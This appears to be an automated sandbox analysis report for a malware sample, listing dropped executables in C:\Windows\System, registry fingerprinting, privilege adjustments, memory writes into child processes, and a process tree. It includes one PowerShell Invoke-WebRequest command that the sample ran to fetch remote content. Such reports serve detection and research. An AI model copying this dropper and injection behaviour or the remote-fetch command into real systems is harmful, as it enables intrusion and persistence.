File created C:\Windows\System\aEONkGF.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\vLjaErR.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\hUoeDHg.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\WOxahWj.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\QOspSFp.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\tORSytw.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\FLvgcyT.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ocRlbEj.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\mgIdXzd.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\AGDktAE.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\BGpdEux.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ouQdGyR.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\xKOyhSF.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\PhYovxJ.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\pghRCeT.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\wpiTXoQ.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\kAPLfhC.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\XfNhpPu.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\eNcefiq.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\lUGkfNp.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\HZpCZiN.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\tEsPRFc.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\cUJGqkW.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\sDswrCJ.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\dtAXqan.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\hADmXOy.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\hrydyGF.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4092 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4092 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4092 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\GKHCzdr.exe
PID 4092 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\GKHCzdr.exe
PID 4092 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\zyXfriu.exe
PID 4092 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\zyXfriu.exe
PID 4092 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\CoMgIai.exe
PID 4092 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\CoMgIai.exe
PID 4092 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\OBojKMl.exe
PID 4092 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\OBojKMl.exe
PID 4092 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\vNWObaP.exe
PID 4092 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\vNWObaP.exe
PID 4092 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\sDswrCJ.exe
PID 4092 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\sDswrCJ.exe
PID 4092 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\KdjDDca.exe
PID 4092 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\KdjDDca.exe
PID 4092 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\SBaVbgy.exe
PID 4092 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\SBaVbgy.exe
PID 4092 wrote to memory of 3772 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\nYlrigx.exe
PID 4092 wrote to memory of 3772 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\nYlrigx.exe
PID 4092 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\ajTYFtv.exe
PID 4092 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\ajTYFtv.exe
PID 4092 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\PoOEMbd.exe
PID 4092 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\PoOEMbd.exe
PID 4092 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\pCcNHhi.exe
PID 4092 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\pCcNHhi.exe
PID 4092 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\wDbcVmk.exe
PID 4092 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\wDbcVmk.exe
PID 4092 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\tnljfwT.exe
PID 4092 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\tnljfwT.exe
PID 4092 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\BpHuLGd.exe
PID 4092 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\BpHuLGd.exe
PID 4092 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\HGyDuGS.exe
PID 4092 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\HGyDuGS.exe
PID 4092 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\YZWJfzb.exe
PID 4092 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\YZWJfzb.exe
PID 4092 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\gDgROHK.exe
PID 4092 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\gDgROHK.exe
PID 4092 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\frImnwz.exe
PID 4092 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\frImnwz.exe
PID 4092 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\vEyZGhR.exe
PID 4092 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\vEyZGhR.exe
PID 4092 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\qxshGxQ.exe
PID 4092 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\qxshGxQ.exe
PID 4092 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\vAgduTt.exe
PID 4092 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\vAgduTt.exe
PID 4092 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\jqHxNAo.exe
PID 4092 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\jqHxNAo.exe
PID 4092 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\pJzRuRL.exe
PID 4092 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\pJzRuRL.exe
PID 4092 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\UDpCFKf.exe
PID 4092 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\UDpCFKf.exe
PID 4092 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\ekihYSz.exe
PID 4092 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\ekihYSz.exe
PID 4092 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\TXJGqwi.exe
PID 4092 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\TXJGqwi.exe
PID 4092 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\oPvzoLm.exe
PID 4092 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\oPvzoLm.exe
PID 4092 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\VUMTidr.exe
PID 4092 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\VUMTidr.exe
PID 4092 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\xxTgzuw.exe
PID 4092 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\xxTgzuw.exe
PID 4092 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\xaWHwGg.exe
PID 4092 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\xaWHwGg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\GKHCzdr.exe

C:\Windows\System\GKHCzdr.exe

C:\Windows\System\zyXfriu.exe

C:\Windows\System\zyXfriu.exe

C:\Windows\System\CoMgIai.exe

C:\Windows\System\CoMgIai.exe

C:\Windows\System\OBojKMl.exe

C:\Windows\System\OBojKMl.exe

C:\Windows\System\vNWObaP.exe

C:\Windows\System\vNWObaP.exe

C:\Windows\System\sDswrCJ.exe

C:\Windows\System\sDswrCJ.exe

C:\Windows\System\KdjDDca.exe

C:\Windows\System\KdjDDca.exe

C:\Windows\System\SBaVbgy.exe

C:\Windows\System\SBaVbgy.exe

C:\Windows\System\nYlrigx.exe

C:\Windows\System\nYlrigx.exe

C:\Windows\System\ajTYFtv.exe

C:\Windows\System\ajTYFtv.exe

C:\Windows\System\PoOEMbd.exe

C:\Windows\System\PoOEMbd.exe

C:\Windows\System\pCcNHhi.exe

C:\Windows\System\pCcNHhi.exe

C:\Windows\System\wDbcVmk.exe

C:\Windows\System\wDbcVmk.exe

C:\Windows\System\tnljfwT.exe

C:\Windows\System\tnljfwT.exe

C:\Windows\System\BpHuLGd.exe

C:\Windows\System\BpHuLGd.exe

C:\Windows\System\HGyDuGS.exe

C:\Windows\System\HGyDuGS.exe

C:\Windows\System\YZWJfzb.exe

C:\Windows\System\YZWJfzb.exe

C:\Windows\System\gDgROHK.exe

C:\Windows\System\gDgROHK.exe

C:\Windows\System\frImnwz.exe

C:\Windows\System\frImnwz.exe

C:\Windows\System\vEyZGhR.exe

C:\Windows\System\vEyZGhR.exe

C:\Windows\System\qxshGxQ.exe

C:\Windows\System\qxshGxQ.exe

C:\Windows\System\vAgduTt.exe

C:\Windows\System\vAgduTt.exe

C:\Windows\System\jqHxNAo.exe

C:\Windows\System\jqHxNAo.exe

C:\Windows\System\pJzRuRL.exe

C:\Windows\System\pJzRuRL.exe

C:\Windows\System\UDpCFKf.exe

C:\Windows\System\UDpCFKf.exe

C:\Windows\System\ekihYSz.exe

C:\Windows\System\ekihYSz.exe

C:\Windows\System\TXJGqwi.exe

C:\Windows\System\TXJGqwi.exe

C:\Windows\System\oPvzoLm.exe

C:\Windows\System\oPvzoLm.exe

C:\Windows\System\VUMTidr.exe

C:\Windows\System\VUMTidr.exe

C:\Windows\System\xxTgzuw.exe

C:\Windows\System\xxTgzuw.exe

C:\Windows\System\xaWHwGg.exe

C:\Windows\System\xaWHwGg.exe

C:\Windows\System\JijMgKD.exe

C:\Windows\System\JijMgKD.exe

C:\Windows\System\cZfDXoF.exe

C:\Windows\System\cZfDXoF.exe

C:\Windows\System\tPLIxpZ.exe

C:\Windows\System\tPLIxpZ.exe

C:\Windows\System\lCYALnO.exe

C:\Windows\System\lCYALnO.exe

C:\Windows\System\gifsCAn.exe

C:\Windows\System\gifsCAn.exe

C:\Windows\System\DMKcRie.exe

C:\Windows\System\DMKcRie.exe

C:\Windows\System\PNrobFp.exe

C:\Windows\System\PNrobFp.exe

C:\Windows\System\RGDkWCe.exe

C:\Windows\System\RGDkWCe.exe

C:\Windows\System\KQiZcSz.exe

C:\Windows\System\KQiZcSz.exe

C:\Windows\System\qOWmApF.exe

C:\Windows\System\qOWmApF.exe

C:\Windows\System\eqVYTsw.exe

C:\Windows\System\eqVYTsw.exe

C:\Windows\System\rlqOnpU.exe

C:\Windows\System\rlqOnpU.exe

C:\Windows\System\BiZjoov.exe

C:\Windows\System\BiZjoov.exe

C:\Windows\System\XgzCMaW.exe

C:\Windows\System\XgzCMaW.exe

C:\Windows\System\TLeRWwG.exe

C:\Windows\System\TLeRWwG.exe

C:\Windows\System\UmRvyTt.exe

C:\Windows\System\UmRvyTt.exe

C:\Windows\System\qRSFXeP.exe

C:\Windows\System\qRSFXeP.exe

C:\Windows\System\jemVRrs.exe

C:\Windows\System\jemVRrs.exe

C:\Windows\System\vdvhmGz.exe

C:\Windows\System\vdvhmGz.exe

C:\Windows\System\QKAeEOG.exe

C:\Windows\System\QKAeEOG.exe

C:\Windows\System\HvvJxLz.exe

C:\Windows\System\HvvJxLz.exe

C:\Windows\System\RdMeMsF.exe

C:\Windows\System\RdMeMsF.exe

C:\Windows\System\LrjsTiX.exe

C:\Windows\System\LrjsTiX.exe

C:\Windows\System\eEaFgHu.exe

C:\Windows\System\eEaFgHu.exe

C:\Windows\System\yMNQkwR.exe

C:\Windows\System\yMNQkwR.exe

C:\Windows\System\VZnDVWO.exe

C:\Windows\System\VZnDVWO.exe

C:\Windows\System\bCiGAcl.exe

C:\Windows\System\bCiGAcl.exe

C:\Windows\System\lOACykL.exe

C:\Windows\System\lOACykL.exe

C:\Windows\System\ejmpjYS.exe

C:\Windows\System\ejmpjYS.exe

C:\Windows\System\FaKtWoh.exe

C:\Windows\System\FaKtWoh.exe

C:\Windows\System\bOyFWWY.exe

C:\Windows\System\bOyFWWY.exe

C:\Windows\System\tMVvksK.exe

C:\Windows\System\tMVvksK.exe

C:\Windows\System\LVDBgCy.exe

C:\Windows\System\LVDBgCy.exe

C:\Windows\System\EEmWrtG.exe

C:\Windows\System\EEmWrtG.exe

C:\Windows\System\KuZhfpY.exe

C:\Windows\System\KuZhfpY.exe

C:\Windows\System\oxvQupe.exe

C:\Windows\System\oxvQupe.exe

C:\Windows\System\eysrNJT.exe

C:\Windows\System\eysrNJT.exe

C:\Windows\System\uVUVLOW.exe

C:\Windows\System\uVUVLOW.exe

C:\Windows\System\UqHmOlj.exe

C:\Windows\System\UqHmOlj.exe

C:\Windows\System\GpEeHkI.exe

C:\Windows\System\GpEeHkI.exe

C:\Windows\System\sHmCabt.exe

C:\Windows\System\sHmCabt.exe

C:\Windows\System\lUGkfNp.exe

C:\Windows\System\lUGkfNp.exe

C:\Windows\System\NwKguBR.exe

C:\Windows\System\NwKguBR.exe

C:\Windows\System\qGPqBqa.exe

C:\Windows\System\qGPqBqa.exe

C:\Windows\System\bQThZPt.exe

C:\Windows\System\bQThZPt.exe

C:\Windows\System\cHuMWpm.exe

C:\Windows\System\cHuMWpm.exe

C:\Windows\System\JKdtGjQ.exe

C:\Windows\System\JKdtGjQ.exe

C:\Windows\System\ctQQWlS.exe

C:\Windows\System\ctQQWlS.exe

C:\Windows\System\Bvqcpvc.exe

C:\Windows\System\Bvqcpvc.exe

C:\Windows\System\OUXcUap.exe

C:\Windows\System\OUXcUap.exe

C:\Windows\System\DCCobYp.exe

C:\Windows\System\DCCobYp.exe

C:\Windows\System\mNgxTnR.exe

C:\Windows\System\mNgxTnR.exe

C:\Windows\System\BjLZczc.exe

C:\Windows\System\BjLZczc.exe

C:\Windows\System\ArYwCte.exe

C:\Windows\System\ArYwCte.exe

C:\Windows\System\nbruhwG.exe

C:\Windows\System\nbruhwG.exe

C:\Windows\System\NmcwPIP.exe

C:\Windows\System\NmcwPIP.exe

C:\Windows\System\jyWDOGf.exe

C:\Windows\System\jyWDOGf.exe

C:\Windows\System\nlaYAjP.exe

C:\Windows\System\nlaYAjP.exe

C:\Windows\System\rRJHDkt.exe

C:\Windows\System\rRJHDkt.exe

C:\Windows\System\QADSsKz.exe

C:\Windows\System\QADSsKz.exe

C:\Windows\System\DmTmrpK.exe

C:\Windows\System\DmTmrpK.exe

C:\Windows\System\aLqhVZB.exe

C:\Windows\System\aLqhVZB.exe

C:\Windows\System\KqjCvkC.exe

C:\Windows\System\KqjCvkC.exe

C:\Windows\System\sZagAEc.exe

C:\Windows\System\sZagAEc.exe

C:\Windows\System\LMtFjwc.exe

C:\Windows\System\LMtFjwc.exe

C:\Windows\System\XvGnqvF.exe

C:\Windows\System\XvGnqvF.exe

C:\Windows\System\CGCqJSG.exe

C:\Windows\System\CGCqJSG.exe

C:\Windows\System\dLgwFfZ.exe

C:\Windows\System\dLgwFfZ.exe

C:\Windows\System\yRXjAJh.exe

C:\Windows\System\yRXjAJh.exe

C:\Windows\System\DqPqvBQ.exe

C:\Windows\System\DqPqvBQ.exe

C:\Windows\System\tKGRBng.exe

C:\Windows\System\tKGRBng.exe

C:\Windows\System\xiSVWgv.exe

C:\Windows\System\xiSVWgv.exe

C:\Windows\System\TuHamCt.exe

C:\Windows\System\TuHamCt.exe

C:\Windows\System\hDepuIA.exe

C:\Windows\System\hDepuIA.exe

C:\Windows\System\eNKGeXG.exe

C:\Windows\System\eNKGeXG.exe

C:\Windows\System\bQKetPV.exe

C:\Windows\System\bQKetPV.exe

C:\Windows\System\jFvEPka.exe

C:\Windows\System\jFvEPka.exe

C:\Windows\System\SQrahVK.exe

C:\Windows\System\SQrahVK.exe

C:\Windows\System\HSQwSUq.exe

C:\Windows\System\HSQwSUq.exe

C:\Windows\System\pwOBkaf.exe

C:\Windows\System\pwOBkaf.exe

C:\Windows\System\ZzZskex.exe

C:\Windows\System\ZzZskex.exe

C:\Windows\System\aEojIVY.exe

C:\Windows\System\aEojIVY.exe

C:\Windows\System\NvJgqoY.exe

C:\Windows\System\NvJgqoY.exe

C:\Windows\System\KvteIWK.exe

C:\Windows\System\KvteIWK.exe

C:\Windows\System\TUUoBoj.exe

C:\Windows\System\TUUoBoj.exe

C:\Windows\System\wIooWzz.exe

C:\Windows\System\wIooWzz.exe

C:\Windows\System\BAqTRDe.exe

C:\Windows\System\BAqTRDe.exe

C:\Windows\System\ztphywA.exe

C:\Windows\System\ztphywA.exe

C:\Windows\System\LRmavBz.exe

C:\Windows\System\LRmavBz.exe

C:\Windows\System\AjfRFoq.exe

C:\Windows\System\AjfRFoq.exe

C:\Windows\System\hARaZgE.exe

C:\Windows\System\hARaZgE.exe

C:\Windows\System\rVVADBF.exe

C:\Windows\System\rVVADBF.exe

C:\Windows\System\gCMabYi.exe

C:\Windows\System\gCMabYi.exe

C:\Windows\System\coKuFMR.exe

C:\Windows\System\coKuFMR.exe

C:\Windows\System\HPxzbXG.exe

C:\Windows\System\HPxzbXG.exe

C:\Windows\System\KehnqOo.exe

C:\Windows\System\KehnqOo.exe

C:\Windows\System\udxTdCP.exe

C:\Windows\System\udxTdCP.exe

C:\Windows\System\OMJxhDA.exe

C:\Windows\System\OMJxhDA.exe

C:\Windows\System\WJuHjSj.exe

C:\Windows\System\WJuHjSj.exe

C:\Windows\System\GyMlLmn.exe

C:\Windows\System\GyMlLmn.exe

C:\Windows\System\xcQkWGj.exe

C:\Windows\System\xcQkWGj.exe

C:\Windows\System\mgIdXzd.exe

C:\Windows\System\mgIdXzd.exe

C:\Windows\System\YVvqnGo.exe

C:\Windows\System\YVvqnGo.exe

C:\Windows\System\iBtctQM.exe

C:\Windows\System\iBtctQM.exe

C:\Windows\System\HAoXUMZ.exe

C:\Windows\System\HAoXUMZ.exe

C:\Windows\System\QasYmtb.exe

C:\Windows\System\QasYmtb.exe

C:\Windows\System\TULpLCr.exe

C:\Windows\System\TULpLCr.exe

C:\Windows\System\HfSIRPv.exe

C:\Windows\System\HfSIRPv.exe

C:\Windows\System\IHcvcFI.exe

C:\Windows\System\IHcvcFI.exe

C:\Windows\System\KazgYFw.exe

C:\Windows\System\KazgYFw.exe

C:\Windows\System\JHOSyhY.exe

C:\Windows\System\JHOSyhY.exe

C:\Windows\System\bZBlnIR.exe

C:\Windows\System\bZBlnIR.exe

C:\Windows\System\RCYhkOS.exe

C:\Windows\System\RCYhkOS.exe

C:\Windows\System\Dciumgj.exe

C:\Windows\System\Dciumgj.exe

C:\Windows\System\MsijAKU.exe

C:\Windows\System\MsijAKU.exe

C:\Windows\System\HqPsvrw.exe

C:\Windows\System\HqPsvrw.exe

C:\Windows\System\WXdDYhi.exe

C:\Windows\System\WXdDYhi.exe

C:\Windows\System\IErEOzI.exe

C:\Windows\System\IErEOzI.exe

C:\Windows\System\PqmpmFK.exe

C:\Windows\System\PqmpmFK.exe

C:\Windows\System\qwVtSDo.exe

C:\Windows\System\qwVtSDo.exe

C:\Windows\System\jxkmVUy.exe

C:\Windows\System\jxkmVUy.exe

C:\Windows\System\GUcXYzi.exe

C:\Windows\System\GUcXYzi.exe

C:\Windows\System\NhLpCgY.exe

C:\Windows\System\NhLpCgY.exe

C:\Windows\System\SBrPORa.exe

C:\Windows\System\SBrPORa.exe

C:\Windows\System\tTEkkyR.exe

C:\Windows\System\tTEkkyR.exe

